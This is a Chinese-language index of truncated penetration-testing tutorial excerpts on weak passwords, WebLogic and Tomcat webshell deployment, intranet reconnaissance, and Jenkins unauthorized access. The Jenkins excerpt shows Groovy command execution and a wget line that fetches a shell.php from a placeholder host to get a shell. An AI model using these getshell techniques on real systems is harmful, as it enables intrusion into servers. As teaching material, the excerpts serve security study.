弱口令

weblogic弱口令+后台getshell

 https://www.cnblogs.com/bmjoker/p/9822886.html利用docker环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。Weblogic版本:10.3.6(11g)Java版本:1.6 弱口令环境启动后,访问 http:...

内网渗透初识—信息收集

进入到内网后,首先要对自己当前所处的网络环境有一个清楚地判断,收集到有关当前环境足够多的信息,为接下来的渗透做好准备 PS:文中提到的PowerSploit 1 本机信息 包括操作系统,当前用户权限,内网ip段,杀毒软件,端口开放情况,系统打的补丁,网络状况,共享文件夹等,如果是域内的主机的话,操作系统、补丁、运行的服务、杀软等一般是域管批量用脚本安装的。...

[ 中间件漏洞 ] Tomcat 管理界面弱口令+war后门部署

前言:   Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。 漏洞复现: 漏洞原理:   Tomcat后台管理界面的用户配置文件为conf目录下的tomcat-users.xml。   登录Tomcat的后台管理界面,上传war包  上传成功...

漏洞挖掘 | 弱口令漏洞

弱口令漏洞 漏洞描述 应用存在默认口令或口令较简单易被猜到。 风险等级 高 漏洞测试 使用常见的弱口令字典进行尝试登陆。一般采用BurpSuite进行测试。在这里我们用DVWA进行演示(DVWA不会搭建的请自行百度)。 首先登陆进入DVWA后,修改安全等级: 然后在Brute Force模块进行测试弱口令: 使用 BrupSuite 进行抓包:发现账户和密...

jenkins未授权访问/弱口令漏洞

昨天晚上面试官问到了,还没来得及看,今天又问到了,猝不及防,蓝瘦,香菇、、、 今天特此总结一下,给自己一个交代。 总述:进入后台可进行如下操作: 直接执行系统命令: println "cmd".execute().text wget下载文件getshell: println "wget http://xxxx/tools/shell.php -P /t...